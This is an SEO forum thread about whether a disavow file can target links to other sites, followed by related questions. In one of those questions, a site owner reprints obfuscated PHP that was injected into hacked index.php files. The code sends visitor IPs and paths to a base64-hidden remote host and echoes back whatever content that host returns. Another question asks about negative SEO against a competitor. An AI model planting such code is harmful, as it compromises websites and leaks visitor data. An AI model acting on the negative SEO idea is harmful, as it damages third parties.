Can you disavow a spammy link that is not pointing to your website?
-
We have submitted several really spammy websites to the Google spam team. We noticed they take a very long time to react to submissions. Do you know if it is possible to disavow a link that is not pointing to your website but rather to a very spammy website?
Thanks
-
Hi Marie,
You are absolutely correct. I was confused. Thanks for clearing that up for me.
Carla
-
You may be confused about what the disavow tool does. Sure, you can put any site in your disavow file. You're basically telling Google that if they crawl that site and find a link on it pointing to yours, they should not pass any PageRank through that link. Google has said several times that they do not use disavow info against the disavowed sites. It is not a spam report.
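For anyone unfamiliar with the mechanics, the disavow file itself is just a plain-text list: one URL or `domain:` rule per line, with `#` starting a comment. A minimal sketch, using hypothetical domains:

```text
# example disavow.txt (hypothetical domains)

# ignore all links from an entire spammy domain
domain:spammy-directory.example

# ignore links from one specific page only
http://some-blog.example/spammy-post.html
```

The file is uploaded per site profile, and its entries only affect links pointing at that site, which is why listing a competitor's domain does nothing to the competitor.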
-
Hi Jessy,
Well, I am glad to see that I am not the only person with the same issue. I held off for a long time on submitting my competitors to the Google spam team, but they continue to use black hat techniques. I will let you know if it works.
Thanks
Carla
-
Yes Carla, it does make sense, and thank you for the explanation.
I too am working in an industry where all of my competitors who outrank me are using black hat tactics, and they haven't been penalized for it at all. It's quite frustrating, and I'd be lying if I said I hadn't considered submitting them to the webspam team. However, I worry that this will somehow come back to bite us later on, so I haven't done so and probably never will. Instead I continue building quality content and trying to organically build authority.
That all said, I'd love it if you kept us posted. I'd really like to know how this all works out for you. Even though you are in another country, it might be a great indicator of the potential problems/benefits to this tactic.
Thanks
-
Hi Jesse and Tuzzell,
We have several competitors that constantly use black hat techniques. They have been doing this for over 2 years, and for some reason the Google algorithm updates are not affecting them. We have stuck to white hat techniques but are getting a bit impatient. For over 2 years our black hat competitors have continued to outrank us. We waited 2 years before submitting them to Google's spam team, and the only reason we did it was because they have not stopped using black hat techniques. It's a bit frustrating. We are not going on a spam crusade... it's more like helping Google do their job, testing the Argentina Google spam team, and learning more about SEO. BTW, we also submitted ourselves to the Google spam team about 2 years back to see if our links were in line with Google's policies.
Hope it makes sense...
Carla
-
I can't wrap my head around why you would want to do this and what you seek to gain from it.
Tuzzell is right, the answer is no, but I am absolutely dying to know why you are leading the spam crusade. (I'm not against it, nor am I for it; I'm totally neutral so far, just curious why.)
-
Short answer: no.
To use the disavow tool you need to be logged into Webmaster Tools, and you need to use the disavow tool under the profile of the relevant site. As such, Google will know that any links you are trying to disavow are associated with, and only authorised for, the site you have signed in under.
Related Questions
-
Link Building vs. Straight Earning Links Discussion
Hello, I'd like to start a discussion on link building outreach techniques vs. just building a good website with good 10X content. I don't like to receive unsolicited emails in my inbox, so why should the people in my industry? Also, I've seen plenty of evidence of 10X content soaring without link building outreach. But link building isn't dead, of course, so can you tell me your personal experiences either way and the ethics of what you do? I especially want to hear if you've had luck with just building good websites and being successful based on the content itself, but an open discussion of either side is welcome. I'm leaning towards just building good websites and letting the Google algo do its thing. Would love to hear your experiences either way. Thanks.
White Hat / Black Hat SEO | | BobGW3 -
Is it Okay to Nofollow all External Links
So, we all "nofollow" most or all external links to hold back PageRank. Is that correct? As per Google, only untrusted and paid links must be nofollowed. Is it still the same regarding external links and nofollow now?
White Hat / Black Hat SEO | | vtmoz0 -
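As a quick reminder of the markup involved, nofollow is applied per link via the `rel` attribute; a sketch with placeholder URLs:

```html
<!-- normal editorial link: followed, passes PageRank -->
<a href="https://trusted-site.example/">A resource we vouch for</a>

<!-- paid or untrusted link: hinted not to pass PageRank -->
<a href="https://untrusted-site.example/" rel="nofollow">User-submitted link</a>
```

A blanket site-wide nofollow is easy to apply, but Google's guidance only calls for it on paid and untrusted links, not on every external link.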
Would it be a good idea to duplicate a website?
Hello, here is the situation: let's say we have a website www.company1.com which is 1 of 3 main online stores catering to a specific market. In an attempt to capture a larger market share, we are considering opening a second website, say www.company2.com. Both these websites have a different URL, but offer the same products for sale to the same clientele. With this second website, the theory is that instead of operating 1 of 3 stores, we now operate 2 of 4. We see 2 ways of doing this: (1) we launch www.company2.com as a copy of www.company1.com, or (2) we launch www.company2.com as a completely different website. The problem I see with either approach is duplicate content. I think the duplicate content issue would be even more of a problem with the first approach, where the entire site is mostly a duplicate. With the second approach, I think the duplicate content issue can be worked around by having completely different product pages and an overall different website structure. Do you think either of these approaches could result in penalties by the search engines? Furthermore, we all know that higher rankings/increased traffic can be achieved through high quality unique content, social media presence, on-going link-building and so on. Now, assuming we have a fixed amount of manpower for these tasks: do you think we have better odds of increasing our overall traffic by sharing the manpower across 2 websites, or putting it all behind a single one? Thanks for your help!
White Hat / Black Hat SEO | | yacpro130 -
How can we compete?
Hi guys, we are new to Moz and just getting some data on one of our projects, Shottle Hall. This is a wedding venue in Derbyshire and, as you can imagine, it's quite a competitive niche. We have been working with them to help build website content and natural links. However, we are up against a lot of sites that have obviously had lots of "questionable" SEO work done in the past, and these sites are still ranking above Shottle Hall. One competitor has lots of links from very low quality blogs that they have obviously made themselves: http://derbyshire-attractions.blogspot.co.uk/ Another site is ranking well and is buying banner links that pass PageRank: http://whimsicalwonderlandweddings.com/ This really makes me think: should we be doing these tactics too? We are told by Google that this is not the way to rank, but I am very disheartened by these facts!
White Hat / Black Hat SEO | | BlueNinja0 -
Website has been hacked: will this hurt ranking?
Today we found out that a website of ours has been hacked and that this code was put into multiple index.php files:

if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
        }
    }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
        {
            $sResult[0]=" ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>

After some searching I found other people mentioning this problem too. They were also saying that this could have an impact on your search rankings. My first question: will this hurt my rankings? Second question: is there something I can do to tell the search engines about the hack so that we don't lose rankings over this? Grtz, Ard
White Hat / Black Hat SEO | | GTGshops0 -
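One practical note on the injected code above: the `base64_decode` call is there to hide the remote URL the script reports to. Decoding the string (here in Python, safely outside the compromised site) shows where the "statistics" are sent:

```python
import base64

# base64 string copied verbatim from the injected PHP above
encoded = "aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw"

# reveal the endpoint the malware builds its tracking URL from
url = base64.b64decode(encoded).decode("ascii")
print(url)  # http://mbrowserstats.com/statH/stat.php
```

Decoding strings like this, and grepping your files for `base64_decode` and `eval`, is a common first step when cleaning up an injection of this kind.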
Can anyone explain these crazy SERPs?
Do a UK-based search for 'short term loans' on Google. There are 7 sites on page 1 without any page or domain authority, several of them registered to a 'Jeremy Hughes', who I am guessing does not really exist. This is a very competitive term and they just shouldn't be making it onto page 1. I'm thinking this must be some clever 301 redirecting, as I can't see any backlinks to any of these sites in Open Site Explorer. Any ideas how these sites are pulling this off?
White Hat / Black Hat SEO | | lethal0r0 -
How fast should I build links?
I have an eCommerce site. I'd like to review 100 of my products on Squidoo. There will be 50 lenses; each lens will review 2-4 products. Each lens will link to each product review and have one link to the website URL. At the end of the project I would have made around 200-250 links to my site. How should I spread out the work? Should I do it within a month? Of course I will do my other link building along with this task. Thanks
White Hat / Black Hat SEO | | giftbasket4kids0 -
Competitors Developing Spammy Link For My Website
Well guys, there is a lot of discussion in almost all the communities, blogs, and forums about the post-Penguin impact. Google says that if they find you're involved in any link building activities, they may penalize you. People out there have already started worrying about the links they developed. But what if our competitors had developed those links? Initially it was okay to develop one-way links, and I even developed a lot of quality, albeit deliberate, links. Around 95% of the links were placed manually, some in return for a favor or money, but all the links look natural. Most of the links I developed through content only, like articles, blog comments, PR submissions, etc. Now I am really skeptical about their quality (after hearing a lot of talk and reading any number of posts). Now, if I were to submit my competitor's website to 1,000 topical directories (obviously not any spammy directory), would it affect that website adversely? What if I spun an existing piece of content, submitted it to 500 article directories, and gave a backlink to the competitor's site using only one anchor text (obviously their main, highest sales-generating keyword)? I look forward to some experts' comments.
White Hat / Black Hat SEO | | Khem_Raj70